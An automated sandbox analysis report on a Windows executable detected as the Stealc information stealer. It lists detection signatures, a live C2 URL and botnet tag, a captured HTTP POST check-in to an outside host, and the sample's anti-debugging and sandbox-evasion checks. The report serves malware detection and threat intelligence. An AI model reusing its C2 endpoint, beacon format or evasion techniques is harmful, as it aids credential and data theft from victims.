Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542970
MD5:a2d11b8a418d4d4f4653ffd4af70d5c7
SHA1:f3067cf41aa873f0a0b363641f7be52f3497ab4b
SHA256:de03784bad73bf146aef041c6d82e2f0e519688bcc6230f4cf88272b24b2a328
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A2D11B8A418D4D4F4653FFD4AF70D5C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7284JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7284JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.520000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T01:47:07.638757+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.520000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0052C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00527240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00527240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00529AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00529AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00529B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00529B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00538EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00538EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00534910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0052DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0052E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00534570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0052ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0052BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00533EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00533EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"9A7933DE1F39786254513------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"puma------EBKKKEGIDBGHIDGDHDBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00524880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"9A7933DE1F39786254513------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"puma------EBKKKEGIDBGHIDGDHDBF--
                Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php-
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/4
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php9
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php:
                Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpY
                Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206Y

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BC0B90_2_007BC0B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB9F90_2_008EB9F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E513D0_2_008E513D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F42060_2_008F4206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F6A3C0_2_008F6A3C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E6B3E0_2_008E6B3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008423630_2_00842363
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00845C0E0_2_00845C0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E6D0B0_2_007E6D0B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E85F60_2_008E85F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9D550_2_008B9D55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009686DA0_2_009686DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F267F0_2_008F267F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F17240_2_008F1724
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pbupcvvt ZLIB complexity 0.9950165471464949
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00539600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00533720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00533720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3TRCETLZ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1865728 > 1048576
                Source: file.exeStatic PE information: Raw size of pbupcvvt is bigger than: 0x100000 < 0x1a1400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.520000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pbupcvvt:EW;eseqydfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pbupcvvt:EW;eseqydfj:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00539860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca9ee should be: 0x1cd4a4
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pbupcvvt
                Source: file.exeStatic PE information: section name: eseqydfj
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009858B0 push edi; mov dword ptr [esp], ecx0_2_009858CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009858B0 push ecx; mov dword ptr [esp], edi0_2_0098592E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009858B0 push ebp; mov dword ptr [esp], esi0_2_0098593A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E0A6 push 5FC68DABh; mov dword ptr [esp], edi0_2_0091E0E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A90A3 push eax; mov dword ptr [esp], ebp0_2_009A950C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A90A3 push ebp; mov dword ptr [esp], edx0_2_009A9AE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099E8D1 push 09B3E6CEh; mov dword ptr [esp], esi0_2_0099E8D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B00CD push edx; mov dword ptr [esp], ebx0_2_009B0910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B00CD push ecx; mov dword ptr [esp], eax0_2_009B0914
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053B035 push ecx; ret 0_2_0053B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE829 push 34C7C552h; mov dword ptr [esp], eax0_2_009DE7A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE829 push ebx; mov dword ptr [esp], 575251B9h0_2_009DE85F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE829 push 6DBA7187h; mov dword ptr [esp], esi0_2_009DE879
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00926029 push 37E85360h; mov dword ptr [esp], ebx0_2_009262C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BC0B9 push 354B4A22h; mov dword ptr [esp], ecx0_2_007BC147
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BC0B9 push 1C5DD1B1h; mov dword ptr [esp], edi0_2_007BC18C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC5062 push edi; mov dword ptr [esp], ecx0_2_00BC50B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC5062 push edi; mov dword ptr [esp], 57CFC0D1h0_2_00BC5114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC5062 push 1EC13951h; mov dword ptr [esp], ebx0_2_00BC513F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push eax; mov dword ptr [esp], 7FFF0864h0_2_0099B098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push 68B46C00h; mov dword ptr [esp], ebp0_2_0099B0A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push eax; mov dword ptr [esp], edi0_2_0099B0B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push edx; mov dword ptr [esp], edi0_2_0099B12C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push edi; mov dword ptr [esp], ebx0_2_0099B150
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push 45720ABBh; mov dword ptr [esp], ecx0_2_0099B1D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push eax; mov dword ptr [esp], ebx0_2_0099B1ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push edx; mov dword ptr [esp], ebp0_2_0099B1F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B078 push edx; mov dword ptr [esp], 3B8F65B0h0_2_0099B1F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AF879 push 4E344040h; mov dword ptr [esp], ecx0_2_009AF8F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FA06A push 79803901h; mov dword ptr [esp], ebp0_2_008FA0F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FA06A push eax; mov dword ptr [esp], ecx0_2_008FA135
                Source: file.exeStatic PE information: section name: pbupcvvt entropy: 7.9539107062128656

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00539860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13222
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782358 second address: 78235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78235C second address: 782360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782360 second address: 782366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F9EC4 second address: 8F9ECC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F9ECC second address: 8F9EE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F228D5156D3h 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA43A second address: 8FA452 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F228CBCA0B3h 0x00000008 jmp 00007F228CBCA0ADh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA729 second address: 8FA72F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA72F second address: 8FA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA738 second address: 8FA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDACF second address: 8FDAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDB21 second address: 8FDB2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDB2A second address: 8FDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
